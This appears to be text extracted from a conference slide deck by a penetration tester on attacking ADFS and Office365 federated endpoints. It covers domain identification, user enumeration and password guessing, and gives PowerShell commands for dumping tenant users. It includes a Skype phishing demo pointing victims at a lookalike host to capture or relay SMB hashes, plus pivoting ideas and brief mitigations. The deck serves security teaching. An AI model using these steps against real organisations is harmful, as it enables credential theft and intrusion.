Attacking ADFS Endpoints with PowerShell Karl Fosaaen - @kfosaaen Active Directory Federation Services (ADFS) has become increasingly popular in the last few years. As a penetration tester, I'm seeing organizations opening themselves up to attacks on ADFS endpoints across the Internet. Manually completing attacks against these endpoints can be tedious. The current native Microsoft management tools are handy, but what if we weaponized them. During this talk, I will show you how to identify domains that support ADFS, confirm email addresses for users of the domain, and help you guess passwords for those users. We'll cover how you can set up your own hosted ADFS domain (on the cheap), and use it to attack other federated domains. On top of that, we'll show you how you can wrap all of the native functionality with PowerShell to automate your attacks. This talk should give penetration testers an overview on how they can start leveraging ADFS endpoints during a penetration test.
https://www.derbycon.com/events/attacking-adfs-endpoints-with-powershell/
2. Introductions
• Who am I?
‒Karl Fosaaen
• What do I do?
‒Wear lots of hats
‒Pen Testing
‒Password Cracking
‒Social Engineering
‒Blog
‒DEF CON Swag Goon
‒Pinball Repair
6. ADFS Overview
Active Directory Federation Services (AD FS)
“is a standards-based service that allows the
secure sharing of identity information
between trusted business partners (known
as a federation) across an extranet.”
Source:
https://msdn.microsoft.com/en-us/library/bb897402.aspx
10. Attack Walkthroughs
• Identifying Federated Endpoints
• Setting Up Your Test Environment
• User Enumeration
• Email Validation and Social Engineering Recon
• Skype Message Phishing
• Dictionary Attacks Against Federated Accounts
• Enumeration of Other Federated Domain Users
• Pivoting to the Internal Network
12. Identifying Federated Endpoints
Side Note:
• Office365 had an Authentication Bypass issue
‒ Insecure SAML assertions
‒ Affected all federated Office365 domains
‒ They called out this method in their blog post
Source:
http://www.economyofmechanism.com/office365-
authbypass.html
22. Identifying Federated Endpoints
• What about the top 1 million Alexa sites?
‒ 47,455 (4.7%) of the top 1 Million have
“ms=ms*” records
• DNS can be a pain at a million records
*Still better than a million HTTP requests to Microsoft
• Other options
‒ ADFS.domain.com
‒ STS.domain.com
24. Setting Up Your Test Environment
• Basic Overview
‒ Buy/Have a domain
‒ Set up/Purchase Skype for Business*
‒ Install Skype for Business Client*
‒ Install Lync 2013 SDK*
‒ Get the NetSPI PowerShell Modules
‒ Install Azure AD PowerShell module
*Note: This is only needed for testing federated Skype for Business
26. Setting Up Your Test Environment
• Get hosted Office365 services
‒ Or set up your own server
27. Setting Up Your Test Environment
• Add your domain to the Office365 portal
28. Setting Up Your Test Environment
• Set up your user and enable federation
29. Setting Up Your Test Environment
• Install Skype for Business and the Lync SDK
‒ Requires Visual Studio 2010 for the easiest
install
https://www.microsoft.com/en-us/download/details.aspx?id=36824
30. Setting Up Your Test Environment
• Login to Skype for Business as your user
31. Setting Up Your Test Environment
• Grab the PowerShell modules from NetSPI
• https://github.com/NetSPI/PowerShell/blob/master/Power
Skype.ps1
• https://github.com/NetSPI/PowerShell/blob/master/Get-
ADFSEndpoint.ps1
32. Setting Up Your Test Environment
• Install the Azure AD PowerShell Module
• https://msdn.microsoft.com/en-
us/library/azure/jj151815(v=azure.98).aspx
34. User Enumeration
• We have:
‒ Some Targets/Endpoints
‒ A testing environment
• We need:
‒ Some users to attack
• Enumerate some users for the organization
off of LinkedIn
• Use one of the many recon frameworks
• Check out the User enumeration work that
nyxgeek spoke about on Friday
42. Email Validation and SE Recon
• What about the top 1 million Alexa sites
• Of those 47,455 “ms=ms*” records
‒ 45 have “Administrator” accounts that have
federated Skype for Business accounts
‒ None of those were actively online during testing…
‒ From nyxgeek:
• 38,658 (3.8%) have hostname
http://lyncdiscover.domain.com
• 486 of 995 unique (Fortune 1000 - 2015) domain
names
• Note:
‒ Skype doesn’t like opening 2,000+ conversations at a time
48. Email Validation and SE Recon
Demo
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -
message "192.168.1.123test”
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -
message “www.microsoftsupport.online"
• SMB capture/relay running on internal network
• UNC works on internal, HRefs work for external
• Send this message out to a group, get or relay hashes
49. Skype Message Phishing
• Further Work
‒ Grab a domains worth of phone numbers
• Got this working while making these slides…
• Should work if you already have creds
‒ Brute-Forcing Skype Creds
• Not easy with the Lync SDK
• Nyxgeek has some great methods that will be
added to PowerSkype
56. Enumeration of Other Domain Users
• Not totally necessary, but it can be handy
1. $msolcred = get-credential
2. connect-msolservice -credential $msolcred
3. Get-MsolUser -All | ft –AutoSize
• This also works for apps using AzureAD for
account management
58. Enumeration of Other Domain Users
• Using the Graph API
$token = Get-GraphAPIToken -TenantName
DOMAIN_GOES_HERE
Get-GraphData -Token $token -Tenant
DOMAIN_GOES_HERE -Resource users
‒ This works for federated and managed domains
• Github –
https://github.com/NetSPI/PowerShell/blob/master/Get-
GraphAPIToken.ps1
61. Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains
• If the domain uses Office365, you can connect
to it with PowerShell
62. Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains (1/2)
$PWord = ConvertTo-SecureString -String
'Summer2016' -AsPlainText –Force
$credentials = New-Object -TypeName
"System.Management.Automation.PSCredential
" -ArgumentList "test@example.com", $PWord
63. Enumeration of Other Domain Users
• Use Exchange online for non-MS managed
domains that have OWA tied to O365 (2/2)
Invoke-Command
-ConfigurationName Microsoft.Exchange
-ConnectionUri
https://outlook.office365.com/powershell-liveid/
-Credential $Credentials
-Authentication Basic -AllowRedirection
-ScriptBlock {Get-Recipient -ResultSize
unlimited} | Export-CSV c:tempemail_users.csv
-NoTypeInformation
66. Pivoting to the Internal Network
• Single Factor VPN Example
‒ Enumerated user emails on LinkedIn
‒ Guessed passwords against MSOnline with
PowerShell
‒ Enumerated VPN interfaces
‒ Logged in with guessed credentials
‒ GPP -> Local admin on DA system
‒ DCSync
• “Store passwords using reversible encryption”
67. Pivoting to the Internal Network
• Other Routes
‒ Single Factor Services
• Management Protocols
• RDP
• SSH
• Sharepoint
• Terminal Services – Web Based
• Citrix
• VDI
• Etc.
68. Pivoting to the Internal Network
• Malicious OneDrive Documents
‒ Can’t use macros in the online version of excel
69. Pivoting to the Internal Network
• Malicious SharePoint Documents
‒ Same concept as OneDrive, just a different
platform
‒ Backdoor a document
‒ Edit pages
70. Pivoting to the Internal Network
• Send messages from OWA or Skype for
Business
‒ Autodiscover is handy
‒ People will trust their co-workers
• “Can you look over this word doc for me?”
71. Pivoting to the Internal Network
• Attacking Email Accounts
‒ If Autodiscover is enabled, adding an account
can be done from anywhere
‒ Email is interesting, but I’d like a shell
‒ This can not be done programmatically with
PowerShell (*Easily)
‒ “Malicious Outlook Rules”
• Nick Landers – Silent Break Security
‒ “MAPI over HTTP and Mailrule Pwnage”
• Etienne - sensepost
74. Attack Mitigations
• Limit federation to trusted domains
• Limit exposed services surface area
• Monitor your Federated and Azure endpoints
• Enforce strong password requirements
75. Thanks!
• My NetSPI Co-workers
‒ QA/Ideas/Suggestions
• My NetSPI Management Team
‒ For giving me time to work on this
• Jared Bird - @jaredbird
‒ For asking me about federation years ago